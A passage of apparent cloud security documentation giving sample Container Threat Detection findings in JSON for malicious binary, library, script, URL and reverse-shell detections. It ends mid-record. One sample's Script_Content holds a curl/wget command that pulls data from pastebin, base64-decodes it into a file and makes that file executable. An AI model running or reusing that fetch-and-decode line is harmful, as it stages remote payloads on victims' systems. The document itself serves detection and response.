"relatedFindingUri": {}
}
}
}
Execution: Built in Malicious Binary Executed
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Built in Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:57.405Z",
"database": {},
"eventTime": "2023-11-13T21:38:57.250Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"NATIVE_API"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/eicar_testing_file\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/eicar_testing_file\"",
"\"built-in-malicious-binary-818358caa95b6d42\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-built-in-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "built_in_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 603253608
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1106/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Execution: Malicious Python executed
{
"finding": {
"canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
"category": "Execution: Malicious Python executed",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_IMAGE_URI",
"imageId": "CONTAINER_IMAGE_ID",
"createTime": "2024-06-17T18:50:13Z"
}
],
"createTime": "2024-06-17T18:50:15.454Z",
"description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
"eventTime": "2024-06-17T18:50:15.217Z",
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "NAMESPACE",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_IMAGE_URI",
"imageId": "CONTAINER_IMAGE_ID",
"createTime": "2024-06-17T18:50:13Z"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"COMMAND_AND_SCRIPTING_INTERPRETER",
"PYTHON"
],
"additionalTactics": [
"COMMAND_AND_CONTROL"
],
"additionalTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"muteUpdateTime": "1970-01-01T00:00:00Z",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "INTERPRETER",
"size": "3492656",
"sha256": "INTERPRETER_SHA_256",
"hashedSize": "3492656",
"partiallyHashed": false,
},
"script": {
"path": "FILENAME",
"size": "4191",
"sha256": "SHA_256",
"hashedSize": "4096",
"partiallyHashed": true,
"contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",
},
"args": [
"INTERPRETER",
"FILENAME"
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"HOSTNAME\"",
"val": "\"CONTAINER_NAME\""
},
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"severity": "CRITICAL",
"state": "ACTIVE",
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"displayName": "CLUSTER_ID",
"type": "google.container.Cluster",
"cloudProvider": "GOOGLE_CLOUD_PLATFORM",
"service": "container.googleapis.com",
"location": "ZONE",
"gcpMetadata": {
"project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
"projectDisplayName": "PROJECT_ID",
"parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
"parentDisplayName": "PROJECT_ID",
"organization": "organizations/ORGANIZATION_ID"
},
"resourcePath": {
"nodes": [
{
"nodeType": "GCP_PROJECT",
"id": "projects/PROJECT_ID",
"displayName": "PROJECT_ID"
},
{
"nodeType": "GCP_ORGANIZATION",
"id": "organizations/ORGANIZATION_ID"
}
]
},
"resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
},
"sourceProperties": {
"Process_Arguments": [
"INTERPRETER",
"FILENAME"
],
"VM_Instance_Name": "INSTANCE_ID",
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
},
"description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
"Container_Creation_Timestamp": {
"seconds": 1718650213,
"nanos": 0
},
"Pod_Name": "CONTAINER_NAME",
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Parent_Pid": 1,
"Container_Name": "CONTAINER_NAME",
"Pid": 7,
"Process_Creation_Timestamp": {
"seconds": 1718650213,
"nanos": 762524370
},
"Environment_Variables": [
],
"Pod_Namespace": "default"
}
}
Execution: Modified Malicious Binary Executed
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:51.893Z",
"database": {},
"eventTime": "2023-11-13T21:38:51.525Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/file_to_be_modified\"",
"\"modified-malicious-binary-da2a7b72e6008bc3\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Execution: Modified Malicious Library Loaded
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:55.271Z",
"database": {},
"eventTime": "2023-11-13T21:38:55.133Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/malicious_files/file_to_be_modified\"",
"\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 124151422
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Malicious Script Executed
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Malicious Script Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Script_Filename": "FILENAME",
"Script_SHA256": "SHA_256",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "INTERPRETER",
"Process_Arguments": ["INTERPRETER", "FILENAME"],
"Pod_Name": "POD_NAME",
"description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",
"Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Script_Content": {
"primitiveDataType": "STRING"
},
"Script_Filename": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Script_SHA256": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Malicious URL Observed
{
"findings": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Malicious URL Observed",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2022-09-14T21:35:46.209Z",
"database": {},
"description": "A malicious URL is observed in the container workload.",
"eventTime": "2022-09-14T21:35:45.992Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {
"uris": [
"testsafebrowsing.appspot.com/s/malware.html"
]
},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/bin/echo\""
},
"script": {},
"args": [
"\"/bin/echo\"",
"\"https://testsafebrowsing.appspot.com/s/malware.html\""
],
"envVariables": [
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"CONTAINER_NAME\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
}
],
"pid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "MEDIUM",
"sourceDisplayName": "Container Threat Detection",
"state": "ACTIVE",
"vulnerability": {},
"workflowState": "NEW"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Process_Binary_Fullpath": "/bin/echo",
"description": "A malicious URL is observed in the container workload.",
"VM_Instance_Name": "VM_INSTANCE_NAME",
"Pid": 1,
"Process_Arguments": [
"/bin/echo",
"https://testsafebrowsing.appspot.com/s/malware.html"
],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Parent_Pid": 0,
"Process_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 7717272
},
"Environment_Variables": [
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=CONTAINER_NAME",
"DEBIAN_FRONTEND=noninteractive",
"LANG=C.UTF-8",
"PYTHONUNBUFFERED=1",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
"KUBERNETES_SERVICE_HOST=IP_ADDRESS",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"KUBERNETES_PORT=tcp://IP_ADDRESS:443",
"KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_PORT_443_TCP_PORT=443",
"HOME=/root"
],
"Container_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 0
},
"Pod_Name": "CONTAINER_NAME"
}
}
Reverse Shell
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Reverse Shell",
"sourceProperties": {
"Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
"Environment_Variables": ["HOSTNAME\u003dreverse-shell",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
"HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
